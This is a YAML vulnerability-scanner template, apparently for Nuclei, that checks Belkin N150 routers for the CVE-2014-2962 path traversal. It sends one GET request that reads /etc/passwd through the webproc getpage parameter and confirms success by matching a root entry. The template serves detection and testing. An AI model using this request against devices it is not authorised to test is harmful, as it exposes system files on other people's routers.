45 lines
1.8 KiB
YAML
45 lines
1.8 KiB
YAML
id: CVE-2014-2962
|
|
|
|
info:
|
|
name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to view sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the system.
|
|
remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
|
|
reference:
|
|
- https://www.kb.cert.org/vuls/id/774788
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-2962l
|
|
- http://www.kb.cert.org/vuls/id/774788
|
|
- http://www.belkin.com/us/support-article?articleNum=109400
|
|
- https://www.exploit-db.com/exploits/38488/
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
|
|
cvss-score: 7.8
|
|
cve-id: CVE-2014-2962
|
|
cwe-id: CWE-22
|
|
epss-score: 0.95825
|
|
epss-percentile: 0.99291
|
|
cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: belkin
|
|
product: n150_f9k1009_firmware
|
|
tags: cve,cve2014,lfi,router,firmware,traversal,belkin
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022026d2b631fa942f9ee77f39d73bfdb3d19e300d528de9d66baa325b64e2577de0022023564b7c13017538b414f940c6f7292a043ec7a7398b7a13991edaca60bd9daa:922c64590222798bb761d5b6d8e72950 |